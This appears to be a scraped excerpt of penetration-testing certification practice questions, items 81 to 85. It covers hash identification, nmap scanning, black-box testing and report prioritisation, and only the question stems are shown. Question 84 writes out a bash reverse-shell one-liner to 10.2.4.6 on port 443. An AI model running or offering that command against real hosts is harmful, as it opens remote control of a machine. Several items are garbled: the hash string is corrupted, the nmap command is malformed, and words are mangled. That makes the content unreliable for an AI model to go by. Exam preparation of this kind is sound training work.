Question 81

If a security consultant comes across a password hash that resembles the following b117 525b3454 7Oc29ca3dBaeOb556ba8 Which of the following formats is the correct hash type?
  • Question 82

    A penetration tester is performing initial intelligence gathering on some remote hosts prior to conducting a vulnerability scan.
    The tester runs the following command:
    nmap -p 192.168.1.1, 192.168.1.2, 192.168.1.3 -sV -o --max-rate 2 192.168.1.130 Which of the following BEST describes why multiple IP addresses are specified?
  • Question 83

    Black box penetration testing strategy provides the tester with:
  • Question 84

    A tester intends to run the following command on a target system:
    bash -i >& /dev/tcp/10.2.4.6/443 0>&1
    Which of the following additional commands would need to be executed on the tester's Linux system .o make (he pre*ous command success?
  • Question 85

    While prioritizing findings and recommendations for an executive summary, which of the following considerations would De MOST valuable to the client?